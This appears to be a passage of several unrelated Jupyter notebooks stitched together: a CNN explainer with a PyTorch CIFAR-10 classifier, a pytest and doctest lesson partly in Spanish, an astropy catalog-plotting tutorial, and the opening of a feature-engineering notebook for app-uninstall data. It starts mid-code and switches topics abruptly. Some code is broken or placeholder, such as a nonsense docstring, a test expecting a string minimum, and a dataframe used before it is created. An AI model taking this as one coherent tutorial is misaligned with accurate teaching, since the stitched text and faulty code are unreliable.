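def conv_output_size(n, f, s=1, p=0):
    return (n + 2 * p - f) // s + 1

# A 6x6 input with a 3x3 filter, stride 1 and no padding gives a 4x4 output;
# padding p=1 keeps the 6x6 size ("same" convolution).
print(conv_output_size(6, 3))        # 4
print(conv_output_size(6, 3, p=1))   # 6
```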
## 1-4) Multiple filters
We can generalize the application of one filter at a time to multiple filters to detect several different features. This is the concept for building convolutional neural networks. Each filter brings its own output and we stack them all together and create an output volume, such as:
<img src='https://miro.medium.com/max/933/1*ySaRmKSilLahyK2WxXC1bA.png' width='500' align="center">
The general formula of the output image can be written as:
<img src='https://miro.medium.com/max/933/1*pN09gs3rXeTh_EwED1d76Q.png' width='500' align="center">
where nc is the number of filters
## 1-5) One-layer of a convolutional neural network
The final step that takes us to a convolutional neural layer is to add the bias and a non-linear function.
The goal of the activation function is to add non-linearity to the network so that it can model non-linear relationships. The most used is the Rectified Linear Unit (ReLU), defined as max(0, z), i.e. thresholding at zero. This function assigns zero to all negative inputs and keeps positive inputs unchanged. This leaves the size of the output volume unchanged ([4x4x1]).
<img src='https://miro.medium.com/max/933/1*LiBZo_FcnKWqoU7M3GRKbA.png' width='300' align="center">
<img src='https://miro.medium.com/max/933/1*EpeM8rTf5RFKYphZwYItkg.png' width='500' align="center">
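A minimal sketch of ReLU and its element-wise effect on a small input:

```python
import numpy as np

def relu(z):
    """Element-wise max(0, z): negatives become 0, positives pass through."""
    return np.maximum(0, z)

z = np.array([[-2.0, 1.5], [0.0, -0.3]])
print(relu(z))  # negatives -> 0, positives unchanged; shape is preserved
```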
The parameters involved in one layer are the elements forming the filters and the bias.
Example: if we have 10 filters of size 3x3x3 in one layer of a neural network, each filter has 27 (3x3x3) weights + 1 bias => 28 parameters. Therefore, the total number of parameters in the layer is 280 (10x28).
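The parameter count from the example can be reproduced with a one-line helper (hypothetical name, shown for illustration):

```python
def conv_layer_params(num_filters, f, channels_in):
    """Each filter has f*f*channels_in weights plus one bias."""
    per_filter = f * f * channels_in + 1
    return num_filters * per_filter

print(conv_layer_params(10, 3, 3))  # 280, as in the example above
```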
## Deep Convolutional Network
<img src='https://miro.medium.com/max/933/1*PT1sP_kCvdFEiJEsoKU88Q.png' width='600' align="center">
# 2) Pooling layer
Pooling layer performs a downsampling operation by progressively reducing the spatial size of the representation (input volume) to reduce the amount of learnable parameters and thus the computational cost; and to avoid overfitting by providing an abstracted form of the input. The Pooling Layer operates independently on every depth slice of the input and resizes it.
There are two types of pooling layers: max and average pooling.
* Max pooling: a filter which takes the largest element within the region it covers.
* Average pooling: a filter which retains the average of the values within the region it covers.
Note: pooling layer does not have any parameters to learn.
<img src='https://miro.medium.com/max/933/1*voEBfjohEDVRK7RpNvxd-Q.png' width='300' align="center">
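Both pooling variants can be sketched in a few lines of NumPy (a minimal illustration with a hypothetical `pool2d` helper, 2x2 window, stride 2):

```python
import numpy as np

def pool2d(x, size=2, stride=2, mode="max"):
    """Downsample by taking the max (or mean) of each size x size window."""
    out = (x.shape[0] - size) // stride + 1
    op = np.max if mode == "max" else np.mean
    return np.array([[op(x[i*stride:i*stride+size, j*stride:j*stride+size])
                      for j in range(out)] for i in range(out)])

x = np.array([[1, 3, 2, 1],
              [4, 6, 5, 0],
              [3, 1, 1, 2],
              [2, 0, 4, 3]], dtype=float)
print(pool2d(x, mode="max"))  # [[6. 5.] [3. 4.]]
print(pool2d(x, mode="avg"))  # [[3.5 2. ] [1.5 2.5]]
```

Note that the helper has no learnable weights, matching the remark above that pooling layers have no parameters.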
# 3) Fully connected layer
Fully connected layer (FC) is a layer where all the layer inputs are connected to all layer outputs. In a classification task, the FC layer combines the features extracted from the data to make the classification work, and computes the class scores used to classify the data. In general, an FC layer is added to make the model end-to-end trainable by learning a function of the high-level features given as output from the convolutional layers.
<img src='https://miro.medium.com/max/933/1*_l-0PeSh3oL2Wc2ri2sVWA.png' width='600' align="center">
It’s common that, as we go deeper into the network, the sizes (nh, nw) decrease, while the number of channels (nc) increases.
# 4) Softmax
The softmax function is a generalization of the sigmoid function, not a loss, used in classification problems. The softmax function is ideally used in the output layer of the classifier, where we actually want the probabilities that define the class of each input.
The Softmax function cannot be applied independently to each $s_i$, since it depends on all elements of $s$. For a given class $s_i$, the Softmax function can be computed as:
$$ f(s)_{i} = \frac{e^{s_{i}}}{\sum_{j}^{C} e^{s_{j}}} $$
Where $s_j$ are the scores inferred by the net for each class in C. Note that the Softmax activation for a class $s_i$ depends on all the scores in $s$.
So, if a network with 3 neurons in the output layer outputs [1.6, 0.55, 0.98], then with a softmax activation function, the outputs get converted to approximately [0.53, 0.19, 0.28]. This way, it is easier for us to classify a given data point and determine to which category it belongs.
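The numbers above can be reproduced with a small NumPy implementation (subtracting the max before exponentiating is a standard numerical-stability trick, not required by the formula):

```python
import numpy as np

def softmax(s):
    """exp(s_i) / sum_j exp(s_j); shifting by max(s) avoids overflow."""
    e = np.exp(s - np.max(s))
    return e / e.sum()

scores = np.array([1.6, 0.55, 0.98])
probs = softmax(scores)
print(np.round(probs, 2))  # [0.53 0.19 0.28]
print(probs.sum())         # probabilities sum to 1
```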
<img src='https://gombru.github.io/assets/cross_entropy_loss/intro.png' width='400' align="center">
# 5) Application of CNN using CIFAR dataset
## 5-1) dataset
For the CNN application, we will use the CIFAR10 dataset. It has the classes: ‘airplane’, ‘automobile’, ‘bird’, ‘cat’, ‘deer’, ‘dog’, ‘frog’, ‘horse’, ‘ship’, ‘truck’. The images in CIFAR-10 are of size 3x32x32, i.e. 3-channel color images of 32x32 pixels in size.
<img src='https://cs231n.github.io/assets/cnn/convnet.jpeg' width='600' align="center">
## 5-2) Load and normalize the CIFAR10 training and test datasets using torchvision
```
import torch
import torchvision # torchvision is for loading the dataset (CIFAR10)
import torchvision.transforms as transforms # torchvision.transforms is for data transformers for images
import numpy as np
# Hyper-parameters
num_epochs = 5
batch_size = 4
learning_rate = 0.001
# dataset has PILImage images of range [0, 1].
# We transform them to Tensors of normalized range [-1, 1]
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
# The CIFAR10 dataset is available in pytorch. We load CIFAR from torchvision.datasets
# CIFAR10: 60000 32x32 color images in 10 classes, with 6000 images per class
train_dataset = torchvision.datasets.CIFAR10(root='./data', train=True,
download=True, transform=transform)
test_dataset = torchvision.datasets.CIFAR10(root='./data', train=False,
download=True, transform=transform)
# We define the pytorch data loader so that we can do batch optimization and batch training
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size,
shuffle=True)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size,
shuffle=False)
# Define the classes
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
```
## 5-3) Define a Convolutional Neural Network
```
import torch.nn as nn # for the neural network
import torch.nn.functional as F # import activation function (relu; softmax)
# Implement the ConvNet
class ConvNet(nn.Module):
def __init__(self):
super(ConvNet, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5) # create the first conv layer-- 3: num of channel; 6: output layer; 5: kernel size
self.pool = nn.MaxPool2d(2, 2) # create the first pool layer -- 2: kernel size; 2: stride size
self.conv2 = nn.Conv2d(6, 16, 5) # create the second conv layer -- 6: the input channel size must be equal to the last output channel size; 16: the output; 5: kernel size
self.fc1 = nn.Linear(16 * 5 * 5, 120) # create the first FC layer (classification); the input size 16*5*5 comes from flattening the [16, 5, 5] feature maps to 1-d
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# -> size of x: [3, 32, 32]
x = self.pool(F.relu(self.conv1(x))) # -> size of x: [6, 14, 14] # call an activation function (relu)
x = self.pool(F.relu(self.conv2(x))) # -> size of x: [16, 5, 5]
x = x.view(-1, 16 * 5 * 5) # -> size of x: [400]
x = F.relu(self.fc1(x)) # -> size of x: [120]
x = F.relu(self.fc2(x)) # -> size of x: [84]
x = self.fc3(x) # -> size of x: [10]
return x
# Create the model
model = ConvNet()
```
<img src='https://miro.medium.com/max/933/1*rOyHQ2teFXX5rIIFHwYDsg.png' width='400' align="center">
## 5-4) Define a Loss function and optimizer
```
# Create the loss function (multiclass-classification problem)--> CrossEntropy
criterion = nn.CrossEntropyLoss() # the softmax is included in the loss
# Create the optimizer (use the stochastic gradient descent to optimize the model parameters given the lr)
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)
```
### Stochastic gradient descent (SGD)
Unlike gradient descent, which sums the squared residuals of all data points at each iteration of the algorithm and is therefore computationally costly, SGD randomly picks one data point from the whole data set at each iteration, reducing the computations enormously.
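As a toy illustration (not the notebook's model), here is the one-sample update SGD performs when fitting y = 2x with a squared-error loss:

```python
import numpy as np

rng = np.random.default_rng(0)
# Toy linear model y = 2x fitted with one-sample (stochastic) updates.
X = rng.uniform(-1, 1, size=100)
y = 2.0 * X
w, lr = 0.0, 0.1
for _ in range(3):                            # epochs
    for i in rng.permutation(len(X)):         # one random sample per update
        grad = 2 * (w * X[i] - y[i]) * X[i]   # d/dw of (w*x - y)^2
        w -= lr * grad                        # the SGD step
print(round(w, 3))  # ~2.0
```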
## 5-5) Train the CNN
```
# training loop
n_total_steps = len(train_loader)
for epoch in range(num_epochs):# loop over the number of epochs (5)
for i, (images, labels) in enumerate(train_loader):
# origin shape: [4, 3, 32, 32] = 4, 3, 1024
# input_layer: 3 input channels, 6 output channels, 5 kernel size
images = images # get the inputs images
labels = labels # get the inputs labels
# Forward pass
outputs = model(images) # forward: calculate the loss between the predicted scores and the ground truth
loss = criterion(outputs, labels) # compute the CrossEntropy loss between the predicted and the real labels
# Backward and optimize
optimizer.zero_grad() # zero the parameter gradients
loss.backward() # backpropagate the loss through the network to compute the gradient of every weight and bias in the CNN
optimizer.step() # apply one SGD update step to the parameters
if (i+1) % 2000 == 0: # print every 2000 mini-batches
print (f'Epoch [{epoch+1}/{num_epochs}], Step [{i+1}/{n_total_steps}], Loss: {loss.item():.4f}')
print('Finished Training')
```
## 5-6) Test the network on the test data
```
# Evaluating the model
with torch.no_grad(): # since we're not training, we don't need to calculate the gradients for our outputs
n_correct = 0
n_samples = 0
n_class_correct = [0 for i in range(10)]
n_class_samples = [0 for i in range(10)]
for images, labels in test_loader:
outputs = model(images) # run images through the network and output the class scores (logits) of each image over the 10 classes
# max returns (value ,index)
_, predicted = torch.max(outputs, 1) # returns the index having the highest probability score of each image over one batch
n_samples += labels.size(0)
n_correct += (predicted == labels).sum().item() # returns the number of corrected classified samples in each batch and increment them to the total right classified samples
for i in range(batch_size):
label = labels[i]
pred = predicted[i]
if (label == pred): # test if the predicted label of a sample is equal to the real label
n_class_correct[label] += 1 # calculate the number of corrected classified samples in each class
n_class_samples[label] += 1 # calculate the number of samples in each class (test data)
acc = 100.0 * n_correct / n_samples # calculate the accuracy classification of the network
outputs
```
* We will visualize the outputs, which represent the class scores of the 4 samples in one batch.
* Each sample has 10 class scores. The index of the class with the highest score is the predicted value, which will be compared with the ground truth later on.
```
import pandas as pd # Visualizing Statistical Data
import seaborn as sns # Visualizing Statistical Data
df = pd.DataFrame({'accuracy_sample 1': outputs[0, 0:10].tolist(), 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy_sample 1', data = df, palette ='plasma')
df = pd.DataFrame({'accuracy_sample 2': outputs[1, 0:10].tolist(), 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy_sample 2', data = df, palette ='plasma')
df = pd.DataFrame({'accuracy_sample 3': outputs[2, 0:10].tolist(), 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy_sample 3', data = df, palette ='plasma')
df = pd.DataFrame({'accuracy_sample 4': outputs[3, 0:10].tolist(), 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy_sample 4', data = df, palette ='plasma')
predicted
labels
n_samples
n_correct
acc = 100.0 * n_correct / n_samples # calculate the accuracy classification of the network
print('The accuracy classification of the network is:', acc)
list_class = []
for i in range(10): # calculate the accuracy classification for each class
acc = 100.0 * n_class_correct[i] / n_class_samples[i]
list_class.append(acc)
print(f'Accuracy of {classes[i]}: {acc} %')
list_class
df = pd.DataFrame({'accuracy': [42.6, 49.9, 25.7, 40.9, 34.8, 26.7, 57.6, 62.6, 68.2, 66.4], 'classes': ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'], })
sns.set_style('darkgrid')
# plot the accuracy classification for each class
sns.barplot(x ='classes', y ='accuracy', data = df, palette ='plasma')
```
The classes that performed well are: car, ship, frog, plane and horse (choose a threshold rate equal to 0.5).
The classes that did not perform well are: bird, cat, deer, dog and truck.
Thanks!
```
# import requests
# with open("mynote.ipynb", "w") as f:
# f.write(requests.get("https://raw.githubusercontent.com/polyrand/teach/master/05_testing/testing.ipynb").text)
# !pip install ipytest
import warnings
warnings.filterwarnings("ignore")
import pytest
import ipytest
ipytest.config(rewrite_asserts=True, magics=True)
__file__ = "testing.ipynb"
assert [1, 2, 3] == [1, 2, 3]
num = 1.25
assert isinstance(num, int), f"num must be an integer but is: {num}"
def test_example():
assert [1, 2, 3] == [1, 2, 3]
def capital_case(x):
return x.capitalize()
capital_case("un texto")
%%run_pytest[clean]
def test_capital_case():
assert capital_case("semaphore") == "Semaphore"
assert capital_case("python") == "Python"
assert capital_case("curso") == "Curso"
%%run_pytest[clean] -qq
import pytest
@pytest.fixture
def supply_AA_BB_CC():
aa = 25
bb = 35
cc = 45
return [aa, bb, cc]
def test_comparewithAA(supply_AA_BB_CC):
zz = 25
assert supply_AA_BB_CC[0] == zz, "aa and zz comparison failed"
def test_comparewithBB(supply_AA_BB_CC):
zz = 35
assert supply_AA_BB_CC[1] == zz, "bb and zz comparison failed"
def test_comparewithCC(supply_AA_BB_CC):
zz = 25
assert supply_AA_BB_CC[2] == zz, "cc and zz comparison failed"
```
## Exercise
Write tests for the following two functions.
```
def maximo(valores):
"""Calcula el valor maximo de un iterable.
Si se encuentra un `str` hará aosdnad
>>> ...
...
"""
max_valor = valores[0]
for val in valores:
if val > max_valor:
max_valor = val
return max_valor
def minimo(valores):
min_valor = valores[0]
for val in valores:
if val < min_valor:
min_valor = val
return min_valor
def maximo(valores):
"""Calcular el valor máximo de un iterable.
>>> maximo([1,2,3,4,5,])
5
>>> maximo([123123,-2,-234234,0])
123123
"""
return max(valores)
def minimo(valores):
return min(valores)
import doctest
doctest.testmod(verbose=True)
%%run_pytest[clean] -qq
def test_minimo():
valores = (2, 3, 1, 4, 6)
val = minimo(valores)
assert val == 1
assert minimo([8,0,4]) == 0
def test_maximo():
valores = (2, 3, 1, 4, 6)
val = maximo(valores)
assert val == 6
%%run_pytest[clean] -m cursopython
@pytest.mark.cursopython
def test_b1():
assert "falcon" == "fal" + "con"
@pytest.mark.cursopython2
def test_b12():
assert "falcon" == "fal" + "con"
%%run_pytest[clean]
@pytest.mark.parametrize(
"valores,resultado",
[
([30, 20, 10], 10),
([200000, -1, 12], -1),
([30, 20, 10], "asd"),
([30, 20, 10], 10),
],
)
def test_parser_xml(valores, resultado):
min_valor = valores[0]
for val in valores:
if val < min_valor:
min_valor = val
assert min_valor == resultado
```
## Unit Tests
```
import unittest
class TestDemo(unittest.TestCase):
"""Example of how to use unittest in Jupyter."""
def test(self):
self.assertEqual("foo".upper(), "FOO")
if __name__ == "__main__":
unittest.main(argv=["first-arg-is-ignored"], exit=False)
```
## Doctests
```
def add(a, b):
"""
Add two elements.
>>> add(2, 2)
4
>>> add(10, 2)
12
>>> add(125, 3)
128
"""
return a + b
import doctest
doctest.testmod(verbose=True)
datos_servers = {
"server_1": [1,2,3],
"server_2": [2,3,4],
"server_3": [4,5,6],
"año": 2020,
"admin": "ricardo",
}
## exercise: write a doctest for this function
def filtrar_diccionario(dd):
"""
Return the keys of a dictionary that start with 'server_'.
If 'server_' appears in the middle of a key it is not captured,
only if it is at the beginning.
>>> datos_servers = {
... "server_1": [1,2,3],
... "server_2": [2,3,4],
... "server_3": [4,5,6],
... "año": 2020,
... "admin": "ricardo",
... }
>>> datos_servers_2 = {
... "hola_server_1": [1,2,3],
... "server_2": [2,3,4],
... "server_3": [4,5,6],
... "año": 2020,
... "admin": "ricardo",
... }
>>> filtrar_diccionario(datos_servers)
['server_1', 'server_2', 'server_3']
>>> filtrar_diccionario(datos_servers_2)
['server_2', 'server_3']
>>> filtrar_diccionario({})
[]
"""
keys = []
for llave in dd.keys():
if llave.startswith("server_"):
keys.append(llave)
return keys
filtrar_diccionario(datos_servers)
import doctest
doctest.testmod(verbose=True)
help(doctest)
import doctest
doctest.testmod(verbose=True)
```
## Exercise
Write doctests for the previous functions!
```
Directory structure that makes running tests easy
Source: https://medium.com/@bfortuner/python-unit-testing-with-pytest-and-mock-197499c4623c
/rootdir
/src
/jobitems
api.py
constants.py
manager.py
models.py
tasks.py
/tests
/integ_tests
/jobitems
test_manager.py
/unit_tests
/jobitems
test_manager.py
requirements.py
application.py
How do I run these tests?
python -m pytest tests/ (all tests)
python -m pytest -k filenamekeyword (tests matching keyword)
python -m pytest tests/utils/test_sample.py (single test file)
python -m pytest tests/utils/test_sample.py::test_answer_correct (single test method)
python -m pytest --resultlog=testlog.log tests/ (log output to file)
python -m pytest -s tests/ (print output to console)
```
## Pytest Monkeypatching
```
# contents of test_module.py with source code and the test
from pathlib import Path
def getssh():
"""Simple function to return expanded homedir ssh path."""
return Path.home() / ".ssh"
def test_getssh(monkeypatch):
# mocked return function to replace Path.home
# always return '/abc'
def mockreturn():
return Path("/abc")
# Application of the monkeypatch to replace Path.home
# with the behavior of mockreturn defined above.
monkeypatch.setattr(Path, "home", mockreturn)
# Calling getssh() will use mockreturn in place of Path.home
# for this test with the monkeypatch.
x = getssh()
assert x == Path("/abc/.ssh")
class C:
def hola(self):
print("Hola")
c = C()
c.hola()
setattr(C, "adios", lambda x: print("adios"))
f = C()
f.adios()
```
# Read in catalog information from a text file and plot some parameters
## Authors
Adrian Price-Whelan, Kelle Cruz, Stephanie T. Douglas
## Learning Goals
* Read an ASCII file using `astropy.io`
* Convert between representations of coordinate components using `astropy.coordinates` (hours to degrees)
* Make a spherical projection sky plot using `matplotlib`
## Keywords
file input/output, coordinates, tables, units, scatter plots, matplotlib
## Summary
This tutorial demonstrates the use of `astropy.io.ascii` for reading ASCII data, `astropy.coordinates` and `astropy.units` for converting RA (as a sexagesimal angle) to decimal degrees, and `matplotlib` for making a color-magnitude diagram and on-sky locations in a Mollweide projection.
```
import numpy as np
# Set up matplotlib
import matplotlib.pyplot as plt
%matplotlib inline
```
Astropy provides functionality for reading in and manipulating tabular
data through the `astropy.table` subpackage. An additional set of
tools for reading and writing ASCII data are provided with the
`astropy.io.ascii` subpackage, but fundamentally use the classes and
methods implemented in `astropy.table`.
We'll start by importing the `ascii` subpackage:
```
from astropy.io import ascii
```
For many cases, it is sufficient to use the `ascii.read('filename')`
function as a black box for reading data from table-formatted text
files. By default, this function will try to figure out how your
data is formatted/delimited (by default, `guess=True`). For example,
if your data are:
# name,ra,dec
BLG100,17:51:00.0,-29:59:48
BLG101,17:53:40.2,-29:49:52
BLG102,17:56:20.2,-29:30:51
BLG103,17:56:20.2,-30:06:22
...
(see _simple_table.csv_)
`ascii.read()` will return a `Table` object:
```
tbl = ascii.read("simple_table.csv")
tbl
```
The header names are automatically parsed from the top of the file,
and the delimiter is inferred from the rest of the file -- awesome!
We can access the columns directly from their names as 'keys' of the
table object:
```
tbl["ra"]
```
If we want to then convert the first RA (as a sexagesimal angle) to
decimal degrees, for example, we can pluck out the first (0th) item in
the column and use the `coordinates` subpackage to parse the string:
```
import astropy.coordinates as coord
import astropy.units as u
first_row = tbl[0] # get the first (0th) row
ra = coord.Angle(first_row["ra"], unit=u.hour) # create an Angle object
ra.degree # convert to degrees
```
Now let's look at a case where this breaks, and we have to specify some
more options to the `read()` function. Our data may look a bit messier::
,,,,2MASS Photometry,,,,,,WISE Photometry,,,,,,,,Spectra,,,,Astrometry,,,,,,,,,,,
Name,Designation,RA,Dec,Jmag,J_unc,Hmag,H_unc,Kmag,K_unc,W1,W1_unc,W2,W2_unc,W3,W3_unc,W4,W4_unc,Spectral Type,Spectra (FITS),Opt Spec Refs,NIR Spec Refs,pm_ra (mas),pm_ra_unc,pm_dec (mas),pm_dec_unc,pi (mas),pi_unc,radial velocity (km/s),rv_unc,Astrometry Refs,Discovery Refs,Group/Age,Note
,00 04 02.84 -64 10 35.6,1.01201,-64.18,15.79,0.07,14.83,0.07,14.01,0.05,13.37,0.03,12.94,0.03,12.18,0.24,9.16,null,L1γ,,Kirkpatrick et al. 2010,,,,,,,,,,,Kirkpatrick et al. 2010,,
PC 0025+04,00 27 41.97 +05 03 41.7,6.92489,5.06,16.19,0.09,15.29,0.10,14.96,0.12,14.62,0.04,14.14,0.05,12.24,null,8.89,null,M9.5β,,Mould et al. 1994,,0.0105,0.0004,-0.0008,0.0003,,,,,Faherty et al. 2009,Schneider et al. 1991,,,00 32 55.84 -44 05 05.8,8.23267,-44.08,14.78,0.04,13.86,0.03,13.27,0.04,12.82,0.03,12.49,0.03,11.73,0.19,9.29,null,L0γ,,Cruz et al. 2009,,0.1178,0.0043,-0.0916,0.0043,38.4,4.8,,,Faherty et al. 2012,Reid et al. 2008,,
...
(see _Young-Objects-Compilation.csv_)
If we try to just use `ascii.read()` on this data, it fails to parse the names out and the column names become `col` followed by the number of the column:
```
tbl = ascii.read("Young-Objects-Compilation.csv")
tbl.colnames
```
What happened? The column names are just `col1`, `col2`, etc., the
default names if `ascii.read()` is unable to parse out column
names. We know it failed to read the column names, but also notice
that the first row of data are strings -- something else went wrong!
```
tbl[0]
```
A few things are causing problems here. First, there are two header
lines in the file and the header lines are not denoted by comment
characters. The first line is actually some meta data that we don't
care about, so we want to skip it. We can get around this problem by
specifying the `header_start` keyword to the `ascii.read()` function.
This keyword argument specifies the index of the row in the text file
to read the column names from:
```
tbl = ascii.read("Young-Objects-Compilation.csv", header_start=1)
tbl.colnames
```
Great! Now the columns have the correct names, but there is still a
problem: all of the columns have string data types, and the column
names are still included as a row in the table. This is because by
default the data are assumed to start on the second row (index=1).
We can specify `data_start=2` to tell the reader that the data in
this file actually start on the 3rd (index=2) row:
```
tbl = ascii.read("Young-Objects-Compilation.csv", header_start=1, data_start=2)
```
Some of the columns have missing data, for example, some of the `RA` values are missing (denoted by -- when printed):
```
print(tbl['RA'])
```
This is called a __Masked column__ because some missing values are
masked out upon display. If we want to use this numeric data, we have
to tell `astropy` what to fill the missing values with. We can do this
with the `.filled()` method. For example, to fill all of the missing
values with `NaN`'s:
```
tbl['RA'].filled(np.nan)
```
Let's recap what we've done so far, then make some plots with the
data. Our data file has an extra line above the column names, so we
use the `header_start` keyword to tell it to start from line 1 instead
of line 0 (remember Python is 0-indexed!). We then had to specify
that the data start on line 2 using the `data_start`
keyword. Finally, we note some columns have missing values.
```
data = ascii.read("Young-Objects-Compilation.csv", header_start=1, data_start=2)
```
Now that we have our data loaded, let's plot a color-magnitude diagram.
Here we simply make a scatter plot of the J-K color on the x-axis
against the J magnitude on the y-axis. We use a trick to flip the
y-axis `plt.ylim(reversed(plt.ylim()))`. Called with no arguments,
`plt.ylim()` will return a tuple with the axis bounds,
e.g. (0,10). Calling the function _with_ arguments will set the limits
of the axis, so we simply set the limits to be the reverse of whatever they
were before. Using this `pylab`-style plotting is convenient for
making quick plots and interactive use, but is not great if you need
more control over your figures.
```
plt.scatter(data["Jmag"] - data["Kmag"], data["Jmag"]) # plot J-K vs. J
plt.ylim(reversed(plt.ylim())) # flip the y-axis
plt.xlabel("$J-K_s$", fontsize=20)
plt.ylabel("$J$", fontsize=20)
```
As a final example, we will plot the angular positions from the
catalog on a 2D projection of the sky. Instead of using `pylab`-style
plotting, we'll take a more object-oriented approach. We'll start by
creating a `Figure` object and adding a single subplot to the
figure. We can specify a projection with the `projection` keyword; in
this example we will use a Mollweide projection. Unfortunately, it is
highly non-trivial to make the matplotlib projection defined this way
follow the celestial convention of longitude/RA increasing to the left.
The axis object, `ax`, knows to expect angular coordinate
values. An important fact is that it expects the values to be in
_radians_, and it expects the azimuthal angle values to be between
(-180º,180º). This is (currently) not customizable, so we have to
coerce our RA data to conform to these rules! `astropy` provides a
coordinate class for handling angular values, `astropy.coordinates.Angle`.
We can convert our column of RA values to radians, and wrap the
angle bounds using this class.
```
ra = coord.Angle(data['RA'].filled(np.nan)*u.degree)
ra = ra.wrap_at(180*u.degree)
dec = coord.Angle(data['Dec'].filled(np.nan)*u.degree)
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111, projection="mollweide")
ax.scatter(ra.radian, dec.radian)
```
By default, matplotlib will add degree tick labels, so let's change the
horizontal (x) tick labels to be in units of hours, and display a grid:
```
fig = plt.figure(figsize=(8,6))
ax = fig.add_subplot(111, projection="mollweide")
ax.scatter(ra.radian, dec.radian)
ax.set_xticklabels(['14h','16h','18h','20h','22h','0h','2h','4h','6h','8h','10h'])
ax.grid(True)
```
We can save this figure as a PDF using the `savefig` function:
```
fig.savefig("map.pdf")
```
## Exercises
Make the map figures as just above, but color the points by the `'Kmag'` column of the table.
Try making the maps again, but with each of the following projections: `aitoff`, `hammer`, `lambert`, and `None` (which is the same as not giving any projection). Do any of them make the data seem easier to understand?
#Feature Engineering Notebook
The data given was in raw format and needed to be converted into a format the model could make sense of. We considered data from 150K users while modelling. <br>
A data frame **final_df** was created with all the features.<br>
A dataframe **uninstall_unique** was created which had data of the users and the latest uninstalled date.
##Mount Google drive in Colab where data is stored
```
from google.colab import drive
drive.mount('/content/drive')
import os
#os.chdir('drive/My Drive/Capstone/CleverTap Capstone/Data')
```
## Import necessary python libraries<br>
As the data was large we tried to use modin for faster computation but we found it was slower than pandas.
```
#!pip install modin
#!pip install --upgrade pandas
#!pip install ray
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings('ignore')
from tqdm import tqdm
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
```
##Function: inttostr()
All six csv data files had a date column with dates stored in integer format. This function converts and formats those dates.
```
def inttostr(x):
x = str(x)
return x[:4]+'-'+x[4:6]+'-'+x[6:]
```
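For example, the integer date 20200131 becomes the string '2020-01-31':

```python
def inttostr(x):
    """Turn an integer date like 20200131 into 'YYYY-MM-DD'."""
    x = str(x)
    return x[:4] + '-' + x[4:6] + '-' + x[6:]

print(inttostr(20200131))  # '2020-01-31'
```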
### Cell description
Below cell stores the number of times a user launched the app and the number of days between the first and the latest launch. The number of days was used to create the additional feature **launch_rate**.
```
launch = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/AppLaunched.csv')
launch['Date'] = pd.to_datetime(launch['Date'].apply(lambda x:inttostr(x)))
userids = launch.UserId.unique()[0:150000]
launch_days_list=[]
install_list=[]
for uid in tqdm(userids):
temp = launch.loc[launch.UserId==uid]
launch_days_list.append((temp.Date.max()-temp.Date.min()).days)
install_list.append(temp.shape[0])
```
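The per-user loop above scans the whole frame once per user. As an alternative sketch (assuming the same `UserId`/`Date` columns as AppLaunched.csv; the mini frame below is hypothetical), a `groupby` computes both features in a single pass:

```python
import pandas as pd

# Hypothetical mini launch log with the same columns as AppLaunched.csv
launch = pd.DataFrame({
    'UserId': [1, 1, 1, 2, 2],
    'Date': pd.to_datetime(['2020-01-01', '2020-01-05', '2020-01-10',
                            '2020-02-01', '2020-02-03']),
})
g = launch.groupby('UserId')['Date']
stats = pd.DataFrame({
    'launched_days': (g.max() - g.min()).dt.days,  # days between first and latest launch
    'installed_times': g.size(),                   # number of launches per user
})
print(stats)
```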
### Cell Description
Below cell stores the latest status of user in the form completed, not completed or unknown.
```
registration = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/Registration.csv')
registration.Status=registration.Status.replace({'Complete':'Completed'})
status_list=[]
country_list = []
for uid in tqdm(userids):
temp = registration.loc[registration.UserId==uid]
status = temp.Status.tolist()[-1] if len(temp.Status.tolist())>0 else 'Unknown'
status_list.append(status)
if temp.shape[0]>0:
country_list.append(temp.Country.value_counts().values[0])
else:
country_list.append(0)
#final_df = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/final_df.csv',index_col=0)
def top_country(x):
if x>2:
return 5
else:return x
temp = pd.Series(country_list).apply(lambda x:top_country(x))
temp = temp.replace({0:'A',1:'B',2:'C',5:'MISC'})
country_list = temp.tolist()
temp.value_counts()
final_df = pd.get_dummies(final_df)
final_df.to_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/final_df.csv')
```
### Cell Description
Below cell stores the number of times a user clicked UTM.
```
utmvisited = pd.read_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/UTMVisited.csv')
utm_list = []
for uid in tqdm(userids):
temp = utmvisited.loc[utmvisited.UserId==uid]
utm_list.append(temp.shape[0])
#utm_list = pd.Series(utm_list)
#utm_list.to_csv('drive/My Drive/Capstone/CleverTap Capstone/Data/utm_visted.csv')
```
### Cell Description
Below cell stores the number of videos a user watched genre wise, category wise and program type wise. <br>
It also stores the number of days a user was active and the number of videos they watched repeatedly. <br>
The number of days is used later to calculate the number of videos a user watched per day.
```
